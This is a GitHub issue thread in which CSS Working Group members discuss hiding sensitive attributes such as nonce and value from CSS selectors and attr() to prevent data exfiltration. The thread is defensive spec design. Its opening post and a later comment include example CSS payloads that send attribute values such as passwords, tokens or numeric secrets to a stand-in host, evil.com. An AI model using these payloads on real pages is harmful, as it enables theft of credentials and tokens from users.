Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[selectors][css-values] Hide "sensitive" attributes from CSS #5136

Open
tabatkins opened this issue May 29, 2020 · 22 comments
Open

[selectors][css-values] Hide "sensitive" attributes from CSS #5136

tabatkins opened this issue May 29, 2020 · 22 comments
Labels

Comments

@tabatkins
Copy link
Member

For a long time, data-exfiltration attacks have been possible using CSS attribute selectors; with careful use of a streaming stylesheet, an attacker can start with input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);} (etc for b-z), then based on that result, stream in another set like [value^="ha"], [value^="hb"], etc, and eventually steal the entire attribute value.

This can be used to get script nonces from a page, csrf tokens from a form, and in some DOM libraries that live-reflect input values into the value attribute, can steal usernames and passwords as well.

We have plans to introduce a url() variant that can take functions in its value, a concat() function for joining strings together, and now have a more powerful attr() function that can be used anywhere to fetch the value of an attribute. Combined, these would make the exfiltration attacks trivial; slipping in a simple style="background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));" would grab the attribute in one go, no cleverness required beyond the initial CSS injection.

Since "concat a URL fragment with an attr value" is actually one of the main use-cases for the concat() function, it would be unfortunate to lose that entirely. And doing so wouldn't stop the more complex exfiltration outlined at the start of this message anyway.

@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely: nonce, value on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with attr().

This seems completely reasonable to me; there's no reasonable use-case for nonce to be usable in CSS, and the use-cases for extracting value (displaying in an error message displayed in a ::before?) are weak enough that I'm happy to remove that.

Thoughts?

@arturjanc
Copy link

A small note that script nonces are already hidden from CSS as a result of whatwg/html#2369 and whatwg/html#2373; my guess is that for sensitive attributes we may need a different approach though.

In general, I'd be very happy with this change (it's strictly security-positive), but I'm not convinced that it's sufficient to safely enable something like concat(). Modern applications use a large number of custom attributes and sensitive strings can appear in any attribute, e.g. data-user-config can have a JSON object with metadata about the user, including a CSRF token or other secrets. A blocklisting approach for a set of "native" attributes will not cover many instances where sensitive data is available in attributes outside of that list; this will increase the risk for existing applications with such patterns.

It would be helpful to at least consider an alternative allowlist-based approach where by default we permit only certain attributes to be accessed from CSS (e.g. ones that seem likely to be useful for developers, anything with a custom new prefix such as css-foo, etc). Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API -- allowing adding custom CSS-accessible attributes in JS wouldn't be any less safe than the status quo, because an attacker with the capability to execute scripts can already obtain any information from the DOM.

@tabatkins
Copy link
Member Author

Argh, exfiltrating numerics as described in #5092 (comment) is clever, and annoying. ^_^

Okay, I've given it some thought, and yeah, I don't see a reasonable way to do this besides an allowlist. Here's my sketch of an idea:

  • on each DocumentOrShadowRoot, define a DOMTokenList of attribute names to expose. These are exposed on every element in that tree scope.
    • Allow a "*" token, to expose all attributes?
  • Attributes whose name matches data-css-* (and/or if we can swing the HTML edit, css-*) are exposed by default.
  • content on a pseudo-element still allows attr(foo string) for any attribute as a top-level value, for back-compat reasons. (Not nested into anything else.)

@faceless2
Copy link

faceless2 commented Jun 2, 2020

We're not quite there yet in terms of browser support, but in theory you could exfiltrate numerics without JavaScript too.

div[secret] {
    background-image: image-set(
        "http://evil.com/2.png" 1dpi,
        "http://evil.com/0.png" calc(mod(attr(secret integer), 2) * 10000dpi)); 
}

@counter-style evil {
    system: symbolic;
    symbols: url(http://evil.com/0.png), url(http://evil.com/1.png)...
}
div[secret]::before {
    counter-reset: foo attr(secret integer);
    content: counter(foo, evil);
}

The first should request "2.png" if the value is modulus 2, "0.png" otherwise. With some prime factors, enough backgrounds and browser support for image-set and mod, you could work out a numeric value. The second won't work because no-one has implemented images for counters yet.

I haven't figured out how to do it for strings yet, but I'm eyeing up @bkardell's "switch" (#5009 (comment)) and similar proposals. With a suitable font, being able to change the background-image based on an element's width would allow you to sniff the letters in generated content.

So yes I agree something needs fixing here. A few thoughts on your proposal.

  • attr(href url) is seen quite a bit in various print+css engines with both target-text and target-counter, to include details about where an internal hyperlink is pointing in the text. If an allowlist is used, perhaps we could add attr(href string) and attr(href url) to it?
<style>
a[href]::after {
    content: "(Chapter " target-counter(attr(href url), chapter)) ", " target-text(attr(href url)) ")";
}
</style>
<p>See <a href="#chap-foo">here</a> for more</p>
<h1 id="chap-foo">Animals</h1>
...
See here (Chapter 4, Animals) for more
  • For reference, other examples I've seen used that wouldn't be caught by your allowlist include:

    • margin-top: calc(attr(data-position) * 20mm);
    • meta[author] { string-set: author attr(author) }
    • background-image: image(attr(image url));
    • bookmark-label: attr(data-bookmark string);
  • As an alternative to managing an allowlist, what about allowing an exemption based on origin? For example, just prevent stylesheets served from a different origin from accessing the attr() function, or only allow them to do so for attr(foo string) in the content property. This would let authors do the neat things they've asked for to their own documents, while preventing third-parties from exfiltrating data.

@tabatkins
Copy link
Member Author

"Based on origin" doesn't help, as we're wanting to defend against CSS injection, which makes the CSS first-party.

It's probably okay to allow most built-in HTML attributes to be used. Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href in your example. But I think we still have to block data-* by default, and allowlist them in.

@xiaochengh
Copy link
Contributor

Regarding allow-list based approach: will it break the existing usage in pseudo-element content property?

@tabatkins
Copy link
Member Author

My thinking is that no, attr() used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.

(But it might be okay to restrict it the same way, if we default to allowlisting most HTML attributes. Depends on existing usage of data-* attributes in attr().)

@Crissov
Copy link
Contributor

Crissov commented Jun 5, 2020

Every attack relies on <url>. Can all other uses of attr() be considered safe and therefore need no restriction at all?

@tabatkins
Copy link
Member Author

Every attack relies on <url>. Can all other uses of attr() be considered safe and therefore need no restriction at all?

Not true, as I linked in an earlier comment: #5092 (comment)

@xiaochengh
Copy link
Contributor

My thinking is that no, attr() used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.

With the latest var()-like spec, it seems pretty hard to distinguish between the old "attr in content as a string" and the advanced "attr in any property as any type".

  • When there's an attr() in a property value, it's substituted right away, so we don't know where it will be consumed eventually -- especially when used together with custom variables
  • At the time the time we compute the value of content of a pseudo-element, attr() has already been substituted

So I'm not sure how to make them behave differently.

@Crissov
Copy link
Contributor

Crissov commented Jun 5, 2020

Fair enough, I should have phrased it as a question: does every attack without Javascript rely on <url>?

@tabatkins
Copy link
Member Author

Possibly (but I wouldn't bet on it without thinking harder). That isn't a meaningful restriction, tho, so the question seems moot anyway.

@Crissov
Copy link
Contributor

Crissov commented Jun 6, 2020

It is meaningful insofar as that apparently Javascript should not have access to any properties set by our depending on a host page, e.g. the width of an iframe. I think that part is outside the responsibility of CSS.

@Crissov
Copy link
Contributor

Crissov commented Jun 6, 2020

However, perhaps one could phrase a CSS-only restriction for replaced (potentially foreign) elements.

@arturjanc
Copy link

Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href in your example. But I think we still have to block data-* by default, and allowlist them in.

My one concern about this specifically is that href, src and other attributes that carry URLs often contain sensitive data; for example, capability URLs include secrets that allow accessing private resources. If we want to limit the exfiltration potential of attr() or other powerful CSS functions, I'd be a little wary of allowlisting such attributes for CSS access by default.

@css-meeting-bot
Copy link
Member

The CSS Working Group just discussed [selectors][css-values] Hide "sensitive" attributes from CSS.

The full IRC log of that discussion <dael> Topic: [selectors][css-values] Hide "sensitive" attributes from CSS
<dael> github: https://github.com//issues/5136
<dael> TabAtkins: Review is this allows for a known attack. Makes it a whole lot easier to do background URLs. rather than partly loading and building letter by letter you can instead grab the whole thing and ship it out.
<dael> TabAtkins: Some bits can be crafted with spec language, but some can't. Some attributes will host data and can be extracted. This is a problem
<dael> TabAtkins: I'd like to be able to code this attributes. But I don't want to expose arbiterary data attributes with sensitive information.
<dael> TabAtkins: Some suggestions in the thread about how to solve. Mark some as safe and unsafe and a mech for JS to swap between categories so you can use some attributes safely.
<dael> TabAtkins: I don't know final solution. It's a blocker for attr b/c makes attack easier.
<dael> TabAtkins: Anyone interested in security concerns please review and help me figure out a solution that's not cumbersome or weird
<dael> astearns: Any initial thoughts?
<dael> faceless2_: This is used already in lots of print engines. It would be a shame to break everything by blocking href and other common
<dael> TabAtkins: We should set up spec so that UA in secure spaces can ignore this. I'm concerned about thigns like css injection attacks. Print should be fine and will make sure I allow it
<dael> astearns: Thanks for intro, we'll get back to this

@othermaciej
Copy link
Member

Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense? Because I don't think that would be true with only the change described in the issue. Untrusted CSS could hide elements of the page, inject text and images, make invisible but still clickable elements appear on top of other elements, etc. Making it safe to include untrusted CSS would be a significant project.

@bradkemper
Copy link
Contributor

I think there are legitimate reasons to allow value attribute selectors, and disallowing them would degrade some pages. For instance, this type of thing probably already exists:

input[type="radio"][value="dangerous-choice"] { color: red }

@arturjanc
Copy link

Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense?

I think the goal is to walk a fine line of enabling CSS to ship new, useful features, while preventing security regressions due to the increasing expressive powers of stylesheets, especially as they start approaching the capabilities of scripts. Restricting stylesheets' ability to access sensitive data in the DOM seems like a compromise that can allow this to happen, because it reduces the potential damage of loading CSS outside of the application's control.

It's certainly generally true that developers shouldn't load arbitrary untrusted CSS, but -- in practice -- since the capabilities of stylesheets are lower than the capabilities of scripts, there are many situations where this can still happen. For example:

  • Loading from CDNs: An application may only load scripts from its own origin, but trust a CDN enough to deliver CSS.
  • Sanitized HTML: In many cases HTML sanitizers have codepaths to allow styles (often, just for style attributes, but sometimes for <style> blocks). Some sanitizers are lax and allow the use of any CSS function; this is fine if the worst that can happen is that the style calls calc(); less so if it can call extract-all-attribute-values-and-send-to-evil-dot-com().
  • Content Security Policy: A lot of CSPs are much stricter about controlling scripts than stylesheets, in part because the ubiquity of style attributes makes it very difficult to ship a CSP with a style-src without 'unsafe-inline'. This is okay if injected CSS is limited in its capabilities, but becomes a problem when CSS gains access to arbitrary data on the page.

So it's not really "make untrusted CSS safe to include", but rather "don't make it significantly more unsafe than it currently is".

@LeaVerou
Copy link
Member

A few questions:

  • Would custom elements defining form controls via ElementInternals be able to declare certain attributes as sensitive?
  • Would JS developers be able to declare a sensitive attribute as "non-sensitive" and expose it to CSS somehow? Or is mirroring it to a data- attribute the only way?

@prlbr
Copy link

prlbr commented Oct 21, 2020

@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely: nonce, value on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with attr().

This seems completely reasonable to me; there's no reasonable use-case for nonce to be usable in CSS, and the use-cases for extracting value (displaying in an error message displayed in a ::before?) are weak enough that I'm happy to remove that.

I would be very unhappy about such a change that breaks old website functionality. For instance, I have used CSS access to the value attribute of checkboxes a lot for multiple-choice test like quizzes. Here's a real life example:

<style>
input[value="x"]:checked + label {color:green}
input[value="x"]:checked + label::after {content: " … is correct! ☺"}
input[value=""]:checked + label {color:red}
input[value=""]:checked + label::after {content: " … is wrong."}
</style>

<fieldset>
<legend>Labradors are passionate:</legend>
<input type="checkbox" id="_37" value=""> <label for="_37">mathematicians</label>
<br><input type="checkbox" id="_38" value=""> <label for="_38">guardians</label>
<br><input type="checkbox" id="_39" value=""> <label for="_39">dancers</label>
<br><input type="checkbox" id="_40" value="x"> <label for="_40">swimmers</label>
</fieldset>

@arturjanc
Copy link

Would custom elements defining form controls via ElementInternals be able to declare certain attributes as sensitive?
Would JS developers be able to declare a sensitive attribute as "non-sensitive" and expose it to CSS somehow? Or is mirroring it to a data- attribute the only way?

I don't think we're at the point of having a specific API proposal here, but IMHO the answer to both questions is that there's nothing preventing us from building an API like this, and it would indeed be useful. Specifically, it would help sites that match on input[value] retain their current functionality, like in the examples mentioned above.

I imagine it would also be possible to build a default allowlist for legacy uses, i.e. we could permit certain functions or properties in combination with commonly used attributes, such as value. This does complicate the design, but it would get us close to allowing backward compatibility while offering a safe path towards shipping new, more powerful, CSS functions.

@mildred
Copy link

mildred commented Dec 14, 2020

Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API

Please take into consideration cases where there is no javascript enabled. Perhaps a declarative definition in the <head> element which is far less likely to contain XSS than the <body> ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests